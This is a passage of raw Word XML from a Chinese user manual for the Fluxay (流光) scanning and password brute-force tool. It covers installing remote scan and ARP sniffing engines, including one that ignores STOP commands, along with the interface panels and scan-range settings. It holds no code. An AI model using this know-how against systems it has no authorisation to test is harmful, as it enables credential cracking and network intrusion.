      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地网络适配器的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>NT Account</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统用户名，必须属于</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>NT Password</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：系统用户的密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Service Name</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：安装的服务名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Display Name</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的说明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：服务的描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Control Process</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：控制服务的进程名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Sensor Process</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：引擎的进程名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Remark</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:t>Console Username</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制服务的用户名，可以任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Console Password</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：控制服务的密码，可以任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Console Port</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制服务监听的端口，可以任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Sensor Port</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描引擎监听的端口，可以任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Disable Service Response for STOP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务将不会响应</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>STOP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，成为系统的关键服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Force Overwirte</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果文件已经存在，强性覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装本地嗅探引擎：如果需要在本地主机进行嗅探（所在的局域网段），必须在本地安装嗅探引擎。安装方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Tools]-&gt;Remote Sniffer-&gt;Install ARP Network Sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDB0D7F" wp14:editId="27A18732">
            <wp:extent cx="3742857" cy="19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42857" cy="1961905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP Address</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：本地的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Account</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：系统的用户名，必须属于</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：系统的密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">Listen Port: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗅探引擎监听的端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">ANS Passwd: </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设定连接嗅探引擎时的密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Install Kernel Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：安装底层嗅探驱动，嗅探底层驱动必须安装且在同一台主机中只用安装一次。如果仅仅为了升级嗅探引擎，底层驱动可以不用安装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Install Program Only</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：安装嗅探引擎，嗅探引擎依赖于底层嗅探驱动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描引擎的服务名称为</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>NetCore</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认监听的端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>1122</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc499884728"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="00F543EA" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1．</w:t>
      </w:r>
      <w:r w:rsidRPr="00F543EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>界面说明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动流光之后，会出现如下的界面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ACC5CA2" wp14:editId="0D0A9A08">
            <wp:extent cx="5274310" cy="40741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4074160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8221" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8221"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="305"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>各部份功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="296"/>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 xml:space="preserve">1: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>暴力破解的设置区域，这个区域主要用于设置暴力破解和其他相关的辅助功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="305"/>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2</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：控制台输出，用于查看当前工作的状态，包括扫描和暴力破解等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="296"/>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3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描出来的典型漏洞列表，在这个列表中大多数情况都可以直接点击，对漏洞加以进一步的验证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="305"/>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4</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描或者暴力破解成功的用户帐号。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="296"/>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5</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描和暴力破解的速度控制（通过设置</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>TCP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的超时时间来实现）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="305"/>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6</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描和暴力破解时的状态显示，包括并发的线程数目和扫描速度等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="296"/>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7</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：中止按钮，可以中止暴力破解和扫描（</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IPC</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的暴力破解除外）＊。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="305"/>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6D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="003E3E5A">
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：查找功能,用来查找之前的扫描记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="00F543EA" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F543EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2．漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从菜单[Scan]-&gt;Advance Scanning（或者按CTRL+A），就可以出现扫描的设置窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC3DD06" wp14:editId="77033141">
            <wp:extent cx="4533333" cy="3657143"/>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33333" cy="3657143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高级扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>扫描范围(Scan Setup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光的扫描包含很多内容，可以根据不同的需要进行选取。扫描的范围可以指定为一个或多个网段，但是这个范围内所包括的主机数目最多不能超过</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5000台（大约相当于19个C段）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Scan Item中，可以选择需要扫描的内容，只有需要扫描的内容，才会出现在相应的设置窗口中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Target OS中可以选择相应的操作系统，扫描引擎可以根据对操作系统的判断，只扫描被选择的操作系统主机。在默认情况下对所有的操作系统进行扫描。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6840" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6840"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="238"/>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230"/>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Server Name: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取主机的名称</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>(Hostname)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="942"/>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Ping First</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：在扫描之前，首先</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>PING</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>目标主机，如果能够</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>PING</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>到才扫描。这样做的好处在于可以过滤掉大量不存在的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址以节约扫描时间，但是也会因此而漏掉一些不响应</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>PING</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的主机。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>端口设置(PORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5085710A" wp14:editId="2A4E722A">
            <wp:extent cx="4514286" cy="3752381"/>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14286" cy="3752381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
